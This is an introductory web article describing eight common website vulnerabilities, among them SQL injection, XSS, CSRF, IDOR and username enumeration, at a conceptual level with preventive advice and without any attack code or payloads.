website vulnerabilities hackers can exploit

Any flaw in a website that can be exploited by a hacker is called a website vulnerability. No doubt, there are many security systems used for protecting a website from cyber threats. However, many times a hacker still manages to find a security breach to penetrate your website. Once he succeeds in hacking your website, he can gain access to the admin panel. Now, he can display anything on your website which can damage your reputation in the market. Important information about your business, clients, and customers is now in the possession of some wicked person. He can use this information for his own benefits and the worst thing he can do is deleting your website files and database. Therefore, while developing and deploying a website, one should always consider all possible security threats and implement essential preventive measures. Here are 8 common website vulnerabilities which can lend a helping hand to hackers:

SQL Injection:

It is a kind of code injection attacks. The hacker in a code injection attack inserts a piece of code in a computer program. The execution of the infected program provides him with the access of the computer program or application. As the database of a website contains sensitive information about customers, clients or other users of a web application, in order to walk off with that confidential information, an attacker attempts to gain the access of database using SQL injection. An attacker first of all finds an input which is to be included in an SQL query. The attacker then inserts the malicious payload which is included in that query and executed by the server. Now, the attacker can create, read, update, alter and delete records maintained in the database. Websites with improper user input verification and validation are always prone to SQL injection. To save your website from SQL injection, always verify and validate the input provided by the user.

Broken authentication and session management:

Incorrect implementation of functionality related to session management and authentication can result in this type of vulnerability. Exploiting this vulnerability, an attacker can thieve session IDs or passwords. The attacker can be an external agent or an authorized user. Both external and internal agents use thieved username and password for posing as an authorized user to access something they are not authorized to access. This vulnerability can exist in a website due to incorrectly built custom authentication and session management schemes by developers. It is important to develop custom authentication and session management schemes correctly and carefully to foil broken authentication and session management. Using complex passwords, limiting the number of login attempts at one time, strengthening password controls, storing passwords in encrypted form, protecting session IDs and there are several other preventive measures which can protect your website from this vulnerability.

Cross Site Scripting (XSS):

Like SQL injection, it is another kind of code injection attack in which malicious code is injected in a website and is executed in a browser. Website using user’s input within output without any validation and encryption are always prone to XSS. In this attack, the browser is targeted indirectly. When the victim visits the infected page , the malicious JavaScript code is delivered to the browser. Once this malicious code is executed, the attacker can access objects like cookies. As session tokens are stored in cookies, the attacker can obtain username and password of the user, steal other data stored in the browser, and even control the browser remotely. For avoiding this type of attack, output based on the input parameters should be encoded, input parameters and output based on input parameters should be filtered for special characters.

Insecure direct object reference:

A website becomes vulnerable to insecure direct object reference when a reference to an internal object is exposed by developers. This internal object can be a file, directory, database records and database keys. Attacker exploiting this vulnerability is an authorized user having limited privileges. The user can access the object he is unauthorized to access by changing parameter value directly referring to that object. Most of the times, web applications do not check if the user is authorized to access that object. Therefore, it is important to enforce access policies to make sure that the user has permission for accessing that object. Proper testing and code analysis is helpful in identifying these flaws in a web application.

Wrong Security Configuration:

A component of a web application can be subjected to security threats due to insecure configuration. An attacker can easily enjoy the privileges of the admin if you stick with the default configurations like using default username and password. Unnecessarily enabled services, scripts, configuration files, sample files etc. can result in misconfiguration at web server, platform, database, application server and other levels of the application stack. Both developers and administrators have to play their parts to ensure the secured configuration of a web application. Security holes due to insecure configuration can be detected by deploying automated scanners. While developing a website, developers should implement an encryption algorithm to encrypt sensitive data. Moreover, track tracers must be hidden from users. An administrator should avoid usage of default username, password and other default settings.

Cross Site Request Forgery (CSRF):

In this kind of attack, the attacker tricks an authorized user of a website to perform an unwanted action like change password, transfer funds etc and the victim does not even know. In this attack, the authorized user unknowingly sends a malicious request to a trusted website. Consider following example:
  1. An authorized user logs into a website (say offering online banking services.
  2. Now the attacker tricks the user to visit a malicious website.
  3. The malicious website will send a request to using the victim’s browser. As the user is already logged into the, the attacker can perform any transaction by impersonating as the victim.

Including a token in user’s current session is the best preventive measure against CSRF. Whenever a user’s session is created, a token is generated which is appended with every request sent during that session. It is then used by the server to make sure that the request is a legitimate request. A token is a long value not easy to guess. However, for additional safety a user should:

  1. never visit any other website when he is logged into a banking or other similar website.
  2. always logout once the job is done.
  3. never save login credentials.

Remote Code Execution:

In remote code execution, an attacker exploits a server vulnerability to execute system level code in the server. By executing this code, the attacker can retrieve or alter the information stored in the server. Most of the times these vulnerabilities exist in the server due to coding errors. All security holes in the server must be fixed to protect it from remote code execution vulnerability.

Username Enumeration:

This vulnerability exists in applications displaying an error message to tell if the provided username is valid or not. This helps an attacker in identifying a valid username after log in attempts with different usernames. Moreover, developers always create trivial accounts for testing purpose. Admin/admin, test/test, and there are some other common username/password combinations used by developers. However, they often forget to delete these accounts which can be used by attackers. Apart from the login page, the attacker can also make attempts on registration, change password and forget password page. First of all, these guessable username/password combinations must be deleted. Consider a login page; an application instead of displaying “username does not exist” and “wrong password”, should display “wrong username/password combination” error. Now, the attacker can never know if the entered username is valid or invalid. Similarly on registration, forget password, and change password, an error message should not reveal a valid username or email address.


Those who have wrong intentions always look for a chink in the armor of a website. Therefore, a website should be developed and deployed by taking all types of vulnerabilities in account. Furthermore, regular updates, tightened access control, network security, installing firewall and security applications, deploying SSL and there are several other ways to protect a website. Regular backup is essential. In case your website is hacked, you are not going to lose your data.